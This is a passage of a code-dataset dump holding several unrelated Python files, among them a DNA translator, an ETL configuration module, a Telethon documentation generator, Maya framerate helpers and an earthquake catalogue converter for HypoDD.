\"GAA\":\"E\", \"GAG\":\"E\",\n \"GGT\":\"G\", \"GGC\":\"G\", \"GGA\":\"G\", \"GGG\":\"G\",}\n\n bp_seq = bp_seq[start_frame:] # Only have start_frame as {0,1,2}\n \n aa_string = ''\n for i in range(0, int(len(bp_seq)/3)):\n triplet = bp_seq[(3*i):(3*(i+1))]\n \n if triplet in gene_map:\n aa_string = aa_string + gene_map[triplet]\n else:\n aa_string = aa_string + 'X'\n\n return aa_string\n\n#%% \ndef get_longest_ORF(aa_seq):\n all_ORF = aa_seq.split('*')\n \n longest_ORF = []\n \n for i in range(0, len(all_ORF)):\n if len(all_ORF[i]) > len(longest_ORF):\n longest_ORF = all_ORF[i]\n #elif len(all_ORF[i]) == len(longest_ORF):\n # print('WARNING, ORFs with same length')\n return longest_ORF\n\n\n#%% \ndef print_gene_results(name_of_gene, sequence):\n print(name_of_gene)\n \n reverse_strand = get_reverse_strand(sequence)\n \n longest_frame = ''\n for i in range(0,3):\n protein_reverse = translate_protein(reverse_strand, i)\n protein_forward = translate_protein(sequence, i)\n \n reverse_longest_ORF = get_longest_ORF(protein_reverse)\n forward_longest_ORF = get_longest_ORF(protein_forward)\n\n if len(reverse_longest_ORF) > len(longest_frame):\n longest_frame = reverse_longest_ORF\n \n if len(forward_longest_ORF) >= len(longest_frame):\n longest_frame = forward_longest_ORF\n if len(longest_frame) > 0: \n print(longest_frame)\n else:\n print('')\n\n \n#%% \ndef main():\n \n with open('translationtest.dna', 'r') as f:\n name_of_gene = ''\n sequence = ''\n \n for line in f:\n if line[0] == '>':\n if not name_of_gene == '':\n print_gene_results(name_of_gene, sequence.upper())\n # Remove possible rest of line\n name_of_gene = line.split(' ')\n name_of_gene = name_of_gene[0].rstrip()\n sequence = ''\n else :\n sequence = sequence + line.rstrip()\n \n print_gene_results(name_of_gene, sequence.upper())\n\n\n\nif __name__ == '__main__':\n main()\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"assignement2/dna2aa.py","file_name":"dna2aa.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471892028","text":"import os, random\n#IPython Notebook implementation\n#from IPython.display import display, Image\nfrom PIL import Image\n\ndata_root = 'D:\\\\Udacity\\\\Deep Learning\\\\notMNIST_small'\n\ndef showRandomImage(dir):\n i = Image.open(os.path.join(data_root, dir, random.choice(os.listdir(dir))))\n i.show()\n #IPython notebook implementation\n #i = Image(filename=os.path.join(data_root, dir, random.choice(os.listdir(dir))))\n #display(i)\n\n\nfor dirs in os.listdir(data_root):\n if os.path.isdir(os.path.join(data_root, dirs)):\n showRandomImage(os.path.join(data_root, dirs))","sub_path":"Deep Learning/Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244520251","text":"#!/usr/local/bin/python3\n\n#@author\t\tBrandon Tarney\n#@date\t\t\t8/31/2018\n#@description\tScript to remove the final column of csv\n\nfrom file_manager import FileManager\nimport csv\nimport argparse\nimport numpy as np\n\n#=============================\n# MAIN PROGRAM\n#=============================\ndef main():\n\t#print('LOG: Main program to run tests')\n\n\tparser = argparse.ArgumentParser(description='Remove the final column')\n\tparser.add_argument('file_path_in', type=str, help='full path to input file')\n\tparser.add_argument('file_path_out', type=str, help='full path to output file')\n\tparser.add_argument('columns', nargs='+', type=int, help='the columns to remove')\n\targs = parser.parse_args()\n\tcolumns = args.columns\n\tcolumns = sorted(columns, reverse=True)\n\tprint('deleting these columns in this order')\n\tprint(columns)\n\n\tdata = FileManager.get_csv_file_data_numpy(args.file_path_in, ',')\n\tfor column in columns:\n\t\tdata = np.delete(data, column, axis=1)\n\tdata_as_numbers = data.astype(np.float)\n\n\tnp.savetxt(args.file_path_out, data_as_numbers, delimiter=',')\n\n\t'''\n\t#INPUTS\n\tprint()\n\tprint('INPUTS')\n\tinput_path = args.file_path_in\n\tprint('input file path:', input_path)\n\toutput_path = args.file_path_out\n\tprint('output file path:', output_path)\n\n\t#STRIP GIVEN COLUMN\n\tcol_idx = args.column\n\twith open(input_path, \"r\") as file_in:\n\t\twith open(output_path, \"w\") as file_out:\n\t\t\twriter = csv.writer(file_out)\n\t\t\tfor row in csv.reader(file_in):\n\t\t\t\tnew_row = row[0:col_idx]\n\t\t\t\tnew_row.append(row[col_idx+1:])\n\t\t\t\twriter.writerow(new_row)\n\t'''\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"src/rm_col.py","file_name":"rm_col.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178397929","text":"#!/usr/bin/python \n\n# Imports \nimport sys, os, subprocess\n\n####################################################################################################\n# @get_files_in_directory\n####################################################################################################\ndef get_files_in_directory(directory,\n file_extension=None):\n \"\"\"\n Gets all the files in a directory, similar to ls command in linux. If the\n file extension is not specified, it returns a list of all the files.\n\n :param directory: Given directory.\n :param file_extension: The extension of requested file.\n :return: A list of the requested files.\n \"\"\"\n\n # A list of all the files that exist in a directory\n files = []\n\n # If the extension is not specified\n if file_extension is None:\n for file in os.listdir(directory):\n files.append(file)\n\n # Otherwise, return files that have specific extensions\n else:\n for file in os.listdir(directory):\n if file.endswith(file_extension):\n files.append(file)\n\n # Return the list\n return files\n \n# PBRT executable \npbrt = '/home/abdellah/projects/bbp-pbrt-v2/build/bin/pbrt'\n\n# Read the input file\ninput_pbrt_file = 'gaussian.pbrt.input'\ninput_pbrt_file_template = list()\n\n# Open the file \ninput_pbrt_file_handle = open(input_pbrt_file, 'r')\n\n# Read it line by line \nfor line in input_pbrt_file_handle:\n input_pbrt_file_template.append(line)\n\n# Close the file \ninput_pbrt_file_handle.close()\n\n# Column y \ncolumn_y = 3.13 \n\n# Column height resolution \nvolume_y = 313\n\n# Step \nstep = column_y / volume_y\n\n# Number of steps \nn_steps = int(column_y / float(step))\n\n# Output directory \noutput_directory = 'output'\n\n# Number of photons \nnumber_photons = 10000000\n\n# Create an output file for each step\nfor i in range(0, 0):#n_steps + 1):\n \n # Output pbrt configuration \n output_pbrt_file_data = list()\n \n # Depth \n depth = str(i * step)\n \n # Prefix \n prefix = '%s_%s' % (depth, str(number_photons))\n \n # Replace the parameters \n for line in input_pbrt_file_template:\n if 'NUMBER_PHOTONS' in line:\n n_photons_line = line\n n_photons_line = n_photons_line.replace('NUMBER_PHOTONS', str(number_photons))\n output_pbrt_file_data.append(n_photons_line)\n elif 'OUTPUT' in line:\n output_line = line\n output_line = output_line.replace(\n 'OUTPUT', '%s_depth%s_n%s' % (str(i), depth, str(number_photons)))\n output_pbrt_file_data.append(output_line)\n elif 'DEPTH' in line:\n depth_line = line\n depth_line = depth_line.replace('DEPTH', depth)\n output_pbrt_file_data.append(depth_line)\n else:\n output_pbrt_file_data.append(line)\n \n # Output file \n output_pbrt_file = '%s/%s_%s.pbrt' % (output_directory, str(i), depth)\n print(output_pbrt_file)\n \n # Write the output file \n output_pbrt_file_handle = open(output_pbrt_file, 'w')\n for line in output_pbrt_file_data:\n output_pbrt_file_handle.write(line)\n \n # Close the output file\n output_pbrt_file_handle.close()\n \n \n# Get all the files in the directory \npbrt_scripts = get_files_in_directory(output_directory, '.pbrt')\n\n# Change directory \nos.chdir(output_directory)\n\n# Execute them one by one \nfor script in pbrt_scripts:\n \n # Execute the script \n shell_command = '%s %s' % (pbrt, script)\n print(shell_command)\n subprocess.call(shell_command, shell=True) \n \n \n","sub_path":"vsd/kernel/create-gaussian-kernels.py","file_name":"create-gaussian-kernels.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120473114","text":"def write_core_index(docs, tlobjects, layer):\n # Determine method, types and constructors count\n types = set()\n method_count = 0\n constructor_count = 0\n for tlobject in tlobjects:\n if tlobject.is_function:\n method_count += 1\n else:\n constructor_count += 1\n\n types.add(tlobject.result)\n\n type_count = len(types)\n types.clear()\n\n # Write the head and the full HTML\n docs.write_head('Telethon API', relative_css_path='css/docs.css')\n\n # Welcome text, small explanation about this page\n docs.write('''

    Telethon API

    \n

    This documentation was generated straight from the scheme.tl\nprovided by Telegram. However, there is no official documentation per se\non what the methods, constructors and types mean. Nevertheless, this\npage aims to provide easy access to all the available methods, their\ndefinition and parameters.

    \n\n

    Although this documentation was generated for Telethon, it may\nbe useful for any other Telegram library out there.

    '''\n\n # Methods section\n '''

    Methods

    \n

    Currently there are {methodcount} methods available for the layer\n{layer}. The complete list can be seen here.\n
    \nTo invoke any of these methods (also called requests), you can do\nas shown on the following example:

    '''\n\n # Example usage for the methods\n '''
    #!/usr/bin/python3\nfrom telethon import TelegramClient\nfrom telethon.tl.functions.messages import GetHistoryRequest\nfrom telethon.utils import get_input_peer\n\n# Use your own values here\napi_id = 12345\napi_hash = '0123456789abcdef0123456789abcdef'\nphone_number = '+34600000000'\n\n# Create the client and connect\nclient = TelegramClient('username', api_id, api_hash)\nclient.connect()\n\n# Ensure you're authorized\nif not client.is_user_authorized():\n    client.send_code_request(phone)\n    client.sign_in(phone, input('Enter the code: '))\n\n# Using built-in methods\ndialogs, entities = client.get_dialogs(10)\nentity = entities[0]\n\n# !! Invoking a request manually !!\nresult = client.invoke(\n    GetHistoryRequest(\n        get_input_peer(entity),\n        limit=20,\n        offset_date=None,\n        offset_id=0,\n        max_id=0,\n        min_id=0,\n        add_offset=0))\n\n# Now you have access to the first 20 messages\nmessages = result.messages
    '''\n\n # Example end\n '''

    As you can see, manually invoking requests with client.invoke()\nis way more verbose than using the built-in methods. However, and given\nthat there are so many methods available, it's impossible to provide a nice\ninterface to things that may change over time. To get full access, however,\nyou're still able to invoke these methods manually.

    '''\n\n # Types section\n '''

    Types

    \n

    Currently there are {typecount} types. You can see the full\nlist here.

    \n\n

    The Telegram types are the abstract results that you receive\nafter invoking a request. They are \"abstract\" because they can have\nmultiple constructors. For instance, the abstract type User\ncan be either UserEmpty or User. You should,\nmost of the time, make sure you received the desired type by using\nthe isinstance(result, Constructor) Python function.\n\nWhen a request needs a Telegram type as argument, you should create\nan instance of it by using one of its, possibly multiple, constructors.

    '''\n\n # Constructors section\n '''

    Constructors

    \n

    Currently there are {constructorcount} constructors. You can see\nthe full list here.

    \n\n

    Constructors are the way you can create instances of the abstract types\ndescribed above, and also the instances which are actually returned from\nthe functions although they all share a common abstract type.

    '''\n\n # Core types section\n '''

    Core types

    \n

    Core types are types from which the rest of Telegram types build upon:

    \n
      \n
    • int:\n The value should be an integer type, like 42.\n It should have 32 bits or less. You can check the bit length by\n calling a.bit_length(), where a is an\n integer variable.\n
    • \n
    • long:\n Different name for an integer type. The numbers given should have\n 64 bits or less.\n
    • \n
    • int128:\n Another integer type, should have 128 bits or less.\n
    • \n
    • int256:\n The largest integer type, allowing 256 bits or less.\n
    • \n\n
    • double:\n The value should be a floating point value, such as\n 123.456.\n
    • \n\n
    • Vector<T>:\n If a type T is wrapped around Vector<T>,\n then it means that the argument should be a list of it.\n For instance, a valid value for Vector<int>\n would be [1, 2, 3].\n
    • \n\n
    • string:\n A valid UTF-8 string should be supplied. This is right how\n Python strings work, no further encoding is required.\n
    • \n\n
    • Bool:\n Either True or False.\n
    • \n\n
    • true:\n These arguments aren't actually sent but rather encoded as flags.\n Any truthy value (True, 7) will enable\n this flag, although it's recommended to use True or\n None to symbolize that it's not present.\n
    • \n\n
    • bytes:\n A sequence of bytes, like b'hello', should be supplied.\n
    • \n\n
    • date:\n Although this type is internally used as an int,\n you can pass a datetime object instead to work\n with date parameters.\n
    • \n
    '''.format(\n layer=layer,\n typecount=type_count,\n methodcount=method_count,\n constructorcount=constructor_count\n ))\n docs.end_body()\n","sub_path":"docs/generate_core.py","file_name":"generate_core.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"408156924","text":"import speech_recognition as sr\nfrom time import ctime\nimport os\nfrom gtts import gTTS\nimport webbrowser\n\ndef speak(audioString):\n tts = gTTS(text=audioString, lang='en')\n tts.save(\"audio.mp3\")\n os.system(\"audio.mp3\")\n\n# Record Audio\ndef recordAudio():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n audio = r.listen(source)\n data = ''\n try:\n data = r.recognize_google(audio)\n except sr.UnknownValueError:\n return \"Google Speech Recognition could not understand audio\"\n except sr.RequestError as e:\n return \"Could not request results from Google Speech Recognition service; {0}\".format(e)\n return data\n\n\ndef jarvis(data):\n if \"how are you\" in data:\n speak(\"I am fine\")\n\n if \"what time is it\" in data:\n speak(ctime())\n\n if \"where is\" in data:\n data = data.split(\" \")\n # location = data[2]\n location = \"london\"\n speak(\"Hold on , I will show you where \" + location + \" is.\")\n url = \"https://www.google.nl/maps/place/\" + location + \"/&\"\n return webbrowser.open_new_tab(url)\n\nif __name__ == '__main__':\n jarvis(\"where is\")","sub_path":"Speech_Text.py","file_name":"Speech_Text.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568213594","text":"\"\"\"\nWe use \"config\" files to refer to all files that may reside in the \"config\" directory:\n* \"Settings\" files (ending in '.yaml') which drive the data warehouse settings\n* Environment files (with variables)\n* Other files (like release notes)\n\nThis module provides global access to settings. Always treat them nicely and read-only.\n\"\"\"\n\nimport datetime\nimport logging\nimport logging.config\nimport os\nimport os.path\nimport re\nimport sys\nfrom collections import OrderedDict\nfrom functools import lru_cache\nfrom typing import Any, Dict, Iterable, List, Optional, Sequence, Set\n\nimport jsonschema\nimport pkg_resources\nimport simplejson as json\nimport yaml\n\nimport etl.config.dw\nimport etl.monitor\nfrom etl.config.dw import DataWarehouseConfig\nfrom etl.errors import ETLRuntimeError, InvalidArgumentError, SchemaInvalidError, SchemaValidationError\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\n# Global config objects - always use accessors!\n_dw_config = None # type: Optional[DataWarehouseConfig]\n_mapped_config = None # type: Optional[Dict[str, str]]\n\n# Local temp directory used for bootstrap, temp files, etc.\nETL_TMP_DIR = \"/tmp/redshift_etl\"\n\n\ndef package_version(package_name=\"redshift_etl\"):\n return \"{} v{}\".format(package_name, pkg_resources.get_distribution(package_name).version)\n\n\ndef get_dw_config():\n return _dw_config\n\n\ndef get_config_value(name: str, default: Optional[str] = None) -> Optional[str]:\n \"\"\"\n Lookup configuration value in known and flattened settings -- pass in a fully-qualified name\n\n Note the side effect here: once accessed, the settings remember the default if it wasn't set before.\n \"\"\"\n assert _mapped_config is not None, \"attempted to get config value before reading config map\"\n if default is None:\n return _mapped_config.setdefault(name)\n else:\n return _mapped_config.setdefault(name, default)\n\n\ndef get_config_int(name: str, default: Optional[int] = None) -> int:\n \"\"\"\n Lookup a configuration value that is an integer.\n It is an error if the value (even when using the default) is None.\n \"\"\"\n if default is None:\n value = get_config_value(name)\n else:\n value = get_config_value(name, str(default))\n if value is None:\n raise InvalidArgumentError(\"missing config for {}\".format(name))\n else:\n return int(value)\n\n\ndef set_config_value(name: str, value: str) -> None:\n \"\"\"\n Set configuration value to given string.\n \"\"\"\n assert _mapped_config is not None, \"attempted to set config value before reading config map\"\n _mapped_config[name] = value\n\n\ndef set_safe_config_value(name: str, value: str) -> None:\n \"\"\"\n Replace \"unsafe\" characters with '-' and set configuration value.\n\n >>> etl.config._mapped_config = {}\n >>> set_safe_config_value(\"test_value\", \"something/unsafe\")\n >>> get_config_value(\"test_value\")\n 'something-unsafe'\n \"\"\"\n set_config_value(name, \"-\".join(re.findall(\"[a-zA-Z0-9_.-]+\", value)))\n\n\ndef get_config_map() -> Dict[str, str]:\n if _mapped_config is None:\n return {}\n else:\n # Since the mapped config is flattened, we don't worry about a deep copy here.\n return dict(_mapped_config)\n\n\ndef _flatten_hierarchy(prefix, props):\n assert isinstance(props, dict), \"oops, this should only be called with dicts, got {}\".format(type(props))\n for key in sorted(props):\n full_key = \"{}.{}\".format(prefix, key)\n if isinstance(props[key], dict):\n for sub_key, sub_prop in _flatten_hierarchy(full_key, props[key]):\n yield sub_key, sub_prop\n else:\n yield full_key, props[key]\n\n\ndef _build_config_map(settings):\n mapping = OrderedDict()\n # Load everything that is not explicitly handled by the data warehouse configuration\n for section in frozenset(settings).difference({\"data_warehouse\", \"sources\", \"type_maps\"}):\n for name, value in _flatten_hierarchy(section, settings[section]):\n mapping[name] = value\n return mapping\n\n\ndef etl_tmp_dir(path: str) -> str:\n \"\"\"\n Return the absolute path within the ETL runtime directory for the selected path.\n \"\"\"\n return os.path.join(ETL_TMP_DIR, path)\n\n\ndef configure_logging(full_format: bool = False, log_level: str = None) -> None:\n \"\"\"\n Setup logging to go to console and application log file\n\n If full_format is True, then use the terribly verbose format of\n the application log file also for the console. And log at the DEBUG level.\n Otherwise, you can choose the log level by passing one in.\n \"\"\"\n config = load_json(\"logging.json\")\n if full_format:\n config[\"formatters\"][\"console\"] = dict(config[\"formatters\"][\"file\"])\n config[\"handlers\"][\"console\"][\"level\"] = logging.DEBUG\n elif log_level:\n config[\"handlers\"][\"console\"][\"level\"] = log_level\n logging.config.dictConfig(config)\n # Ignored due to lack of stub in type checking library\n logging.captureWarnings(True) # type: ignore\n logger.info(\"Starting log for %s with ETL ID %s\", package_version(), etl.monitor.Monitor.etl_id)\n logger.info('Command line: \"%s\"', \" \".join(sys.argv))\n logger.debug(\"Current working directory: '%s'\", os.getcwd())\n logger.info(get_release_info())\n\n\ndef load_environ_file(filename: str) -> None:\n \"\"\"\n Load additional environment variables from file.\n\n Only lines that look like 'NAME=VALUE' or 'export NAME=VALUE' are used,\n other lines are silently dropped.\n \"\"\"\n logger.info(\"Loading environment variables from '%s'\", filename)\n with open(filename) as f:\n for line in f:\n tokens = [token.strip() for token in line.split(\"=\", 1)]\n if len(tokens) == 2 and not tokens[0].startswith(\"#\"):\n name = tokens[0].replace(\"export\", \"\").strip()\n value = tokens[1]\n os.environ[name] = value\n\n\ndef load_settings_file(filename: str, settings: dict) -> None:\n \"\"\"\n Load new settings from config file or a directory of config files\n and UPDATE settings (old settings merged with new).\n \"\"\"\n logger.info(\"Loading settings from '%s'\", filename)\n with open(filename) as f:\n new_settings = yaml.safe_load(f)\n for key in new_settings:\n # Try to update only update-able settings\n if key in settings and isinstance(settings[key], dict):\n settings[key].update(new_settings[key])\n else:\n settings[key] = new_settings[key]\n\n\ndef get_release_info() -> str:\n \"\"\"\n Read the release file and return all lines bunched into one comma-separated value.\n Life's exciting. And short. But mostly exciting.\n \"\"\"\n if pkg_resources.resource_exists(__name__, \"release.txt\"):\n content = pkg_resources.resource_string(__name__, \"release.txt\")\n text = content.decode(errors=\"ignore\").strip()\n lines = [line.strip() for line in text.split(\"\\n\")]\n release_info = \", \".join(lines)\n else:\n release_info = \"Not available. Hint: release info will be created by upload_env.sh\"\n return \"Release information: \" + release_info\n\n\ndef yield_config_files(config_files: Sequence[str], default_file: str = None) -> Iterable[str]:\n \"\"\"\n Generate filenames from the list of files or directories in :config_files and :default_file\n\n If the default_file is not None, then it is always prepended to the list of files.\n (It is an error (sadly, at runtime) if the default file is not a file that's part of the package.)\n\n Note that files in directories are always sorted by their name.\n \"\"\"\n if default_file:\n yield pkg_resources.resource_filename(__name__, default_file)\n\n for name in config_files:\n if os.path.isdir(name):\n files = sorted(os.path.join(name, n) for n in os.listdir(name))\n else:\n files = [name]\n for filename in files:\n yield filename\n\n\ndef load_config(config_files: Sequence[str], default_file: str = \"default_settings.yaml\") -> None:\n \"\"\"\n Load settings and environment from config files (starting with the default if provided),\n set our global settings.\n\n The settings are validated against their schema.\n If the config \"file\" is actually a directory, (try to) read all the files in that directory.\n \"\"\"\n settings = dict() # type: Dict[str, Any]\n count_settings = 0\n for filename in yield_config_files(config_files, default_file):\n if filename.endswith(\".sh\"):\n load_environ_file(filename)\n elif filename.endswith((\".yaml\", \".yml\")):\n load_settings_file(filename, settings)\n count_settings += 1\n else:\n logger.info(\"Skipping unknown config file '%s'\", filename)\n\n # Need to load at least the defaults and some installation specific file:\n if count_settings < 2:\n raise ETLRuntimeError(\"Failed to find enough configuration files (need at least default and local config)\")\n\n validate_with_schema(settings, \"settings.schema\")\n\n # If 'today' and 'yesterday' are not set already, pick the actual values of \"today\" and \"yesterday\" (wrt UTC).\n today = datetime.datetime.utcnow().date()\n date_settings = settings.setdefault(\"date\", {})\n date_settings.setdefault(\"today\", today.strftime(\"%Y/%m/%d\")) # Render date to look like part of a path\n date_settings.setdefault(\"yesterday\", (today - datetime.timedelta(days=1)).strftime(\"%Y/%m/%d\"))\n\n global _mapped_config\n _mapped_config = _build_config_map(settings)\n\n global _dw_config\n _dw_config = etl.config.dw.DataWarehouseConfig(settings)\n\n set_config_value(\"version\", package_version())\n\n\ndef validate_with_schema(obj: dict, schema_name: str) -> None:\n \"\"\"\n Validate the given object (presumably from reading a YAML file) against its schema.\n\n This will also validate the schema itself!\n \"\"\"\n validation_internal_errors = (\n jsonschema.exceptions.ValidationError,\n jsonschema.exceptions.SchemaError,\n json.scanner.JSONDecodeError,\n )\n try:\n schema = etl.config.load_json(schema_name)\n jsonschema.Draft4Validator.check_schema(schema)\n except validation_internal_errors as exc:\n raise SchemaInvalidError(\"schema in '%s' is not valid\" % schema_name) from exc\n try:\n jsonschema.validate(obj, schema)\n except validation_internal_errors as exc:\n raise SchemaValidationError(\"failed to validate against '%s'\" % schema_name) from exc\n\n\ndef gather_setting_files(config_files: Sequence[str]) -> List[str]:\n \"\"\"\n Gather all settings files (*.yaml and *.sh files) -- this drops any hierarchy in the config files (!).\n\n It is an error if we detect that there are settings files in separate directories that have the same filename.\n So trying '-c hello/world.yaml -c hola/world.yaml' triggers an exception.\n \"\"\"\n settings_found = set() # type: Set[str]\n settings_with_path = []\n\n for fullname in yield_config_files(config_files):\n filename = os.path.basename(fullname)\n if filename.startswith(\"credentials\") and filename.endswith(\".sh\"):\n continue\n if filename.endswith((\".yaml\", \".yml\", \".sh\")):\n if filename not in settings_found:\n settings_found.add(filename)\n else:\n raise KeyError(\"found configuration file in multiple locations: '%s'\" % filename)\n settings_with_path.append(fullname)\n return sorted(settings_with_path)\n\n\n@lru_cache()\ndef load_json(filename: str):\n return json.loads(pkg_resources.resource_string(__name__, filename)) # type: ignore\n\n\nif __name__ == \"__main__\":\n print(get_release_info())\n","sub_path":"python/etl/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47881112","text":"import re\n\nfrom maya import cmds \n\n\n# These are all of the named framerates. The rest of them look\n# like \"100fps\".\nunit_to_fps = {\n 'sec': 1,\n 'game': 15, \n 'film': 24, \n 'pal': 25, \n 'ntsc': 30, \n 'show': 48, \n 'palf': 50, \n 'ntscf': 60,\n 'millisec': 1000,\n # NOTE: We don't support 'min' or 'hour' here because we return integers.\n}\n\nfps_to_unit = {v: k for k, v in unit_to_fps.iteritems()}\n\nvalid_fpses = frozenset((\n\n # The named ones above.\n 15, 24, 25, 30, 48, 50, 60, \n\n # The rest of the known valid FPSes as of Maya 2016.\n 2, 3, 4, 5, 6, 8, 10, 12, 16, 20, 40, 75, 80, 100, 120, 125, 150, 200,\n 240, 250, 300, 375, 400, 500, 600, 750, 1200, 1500, 2000, 3000, 6000,\n\n))\n\n\ndef get_fps():\n '''\n Get current framerate as an integer.\n\n ::\n >>> units.get_fps()\n 24\n\n '''\n\n unit = cmds.currentUnit(q=True, time=True)\n try: \n return unit_to_fps[unit]\n except KeyError:\n pass\n\n m = re.match(r'(\\d+)fps', unit)\n if m:\n return int(m.group(1))\n\n raise ValueError(\"Unknown Maya time unit %r\" % unit)\n\n\ndef set_fps(fps):\n '''\n Set current framerate as an integer.\n\n :param int fps: The framerate to set.\n\n ::\n >>> units.set_fps(12)\n >>> units.get_fps()\n 12\n\n '''\n\n unit = fps_to_unit.get(fps) or ('%dfps' % fps)\n try:\n cmds.currentUnit(time=unit)\n except ValueError:\n raise ValueError(\"Unsupported framerate %s\" % fps)\n","sub_path":"mayatools/units/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117672683","text":"import cv2\nimport numpy\n\nname = 'mean'\n\nclass Mean:\n\n def getMean(self, buffer):\n \n stackedFlattened = numpy.vstack((frame.ravel() for frame in buffer)) \n frameShape = buffer[0].shape\n del buffer\n \n meanImageFlattened = numpy.mean(stackedFlattened, axis = 0)\n del stackedFlattened\n \n meanImage = numpy.uint8(meanImageFlattened.reshape(frameShape))\n del meanImageFlattened\n\n return meanImage\n","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495007311","text":"def bubble_sort(arr):\n swaps = 0\n for i in range(len(arr)):\n \n for j in range(len(arr)-i-1):\n \n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n swaps += 1\n return swaps\n\nif __name__ == \"__main__\":\n \n arr = [6,3,5,2,8,4,1]\n no_swaps = bubble_sort(arr)\n print(arr, no_swaps)","sub_path":"Sorting/bubbleSort-CountSwaps CTCI.py","file_name":"bubbleSort-CountSwaps CTCI.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590049889","text":"import os\nimport pickle\nfrom eQ_rw import q_filter, map_area\nfrom bmkg_rw import ReadBMKG\nfrom hypodd_rw import WriteHypoDD\nfrom datetime import datetime as dt\nfrom check_outliers import check_outliers\n\n\"\"\"\n===========================================\nearthquake katalog converter by @eqhalauwet\n==========================================\n\nPython script for convert BMKG arrival data to velest.\n\nWritten By, eQ Halauwet BMKG-PGR IX Ambon.\nyehezkiel.halauwet@bmkg.go.id\n\n\nNotes:\n\n1. It is read bmkg arrival data using \"ReadBMKG\" then convert to velest format.\n2. Data can be filtered of area and quality parameter (gap, rms, min phase, etc).\n3. Output in velest .cnv format (phase P & S), and additional catalog list and arrival.\n\nLogs:\n\n2018-Sep: Added filter option.\n2020-May: Change file input type from obj to list, so that it can import from several files.\n2020-May: Add filter phase routine\n\n\"\"\"\n# fileinput = ['D:/BMKG/Katalog/Arrival PGN/list_detail_2008.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2009.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2010.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2011.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2012.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2013.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2014.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2015.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2016.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2017.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2018.txt',\n# 'D:/BMKG/Katalog/Arrival PGN/list_detail_2019.txt']\n# fileinput = ['list_detail2.txt']\n# bmkgdata, ids = ReadBMKG(fileinput)\n# save_dic = True # Save filtered dictionary or not?\n\nif not os.path.exists('output'):\n os.makedirs('output')\nif not os.path.exists('dict_data'):\n os.makedirs('dict_data')\n\nout_root = 'output'\noutput = os.path.join(out_root, 'phase.dat')\noutput_arr = os.path.join(out_root, 'arrival.dat')\noutput_cat = os.path.join(out_root, 'catalog.dat')\nout_log = os.path.join(out_root, 'log.txt')\nout_geo = os.path.join(out_root, 'sts_geometry.dat')\nout_dic = os.path.join('dict_data', 'Maluku_2008-2019.pkl')\n\npkl_file = open(out_dic, \"rb\")\nbmkgdata = pickle.load(pkl_file)\nids = '__earthquake data converter by eQ Halauwet__\\n\\n'\nsave_dic = False # True/False\n\n# FILTER PARAMETER\n# Filter temporal and spatial\nmin_time = dt(2009, 1, 1) # (year, month, day)\nmax_time = dt(2019, 12, 31) # (year, month, day)\nulat = -2.5\nblat = -4.5\nllon = 127\nrlon = 130.5\nmax_depth = 60\n\n# Filter kualitas data: batasan max azimuth_gap & rms_residual, min phase tiap event dan max jarak_sensor (degree)\nrem_fixd = False\nmax_rms = 2\nmax_gap = 360\nmax_spatial_err = 100\nmode = 'manual'\n\n# Filter phase\nlst_phase = ['AAI', 'AAII', 'KRAI', 'MSAI', 'BNDI', 'BANI', 'NLAI', 'BSMI', 'OBMI']\nmin_P = 6\nmin_S = 0\n\nfilt_dic = {'min_tim': min_time,\n 'max_tim': max_time,\n 'area': {'top': ulat,\n 'bot': blat,\n 'left': llon,\n 'right': rlon\n },\n 'max_dep': max_depth,\n 'rm_fixd': rem_fixd,\n 'max_rms': max_rms,\n 'max_gap': max_gap,\n 'max_err': max_spatial_err,\n 'mode': mode,\n 'phase': {'lst_pha': lst_phase,\n 'min_P': min_P,\n 'min_S': min_S}\n }\n\nfiltered_data = q_filter(bmkgdata, filt_dic, inptype='BMKG', prob_flag=False)\n\nWriteHypoDD(inp=filtered_data, area=filt_dic['area'], out=output, out_arr=output_arr,\n out_cat=output_cat, out_geom=out_geo, out_log=out_log)\n\nmap_area(filt_dic['area'], out_dir=out_root)\n\ncheck_outliers(arrival_file=output_arr, out_dir=out_root, std_error=4, plot_flag=False)\n\nif save_dic:\n nldic = open(out_dic, 'wb')\n 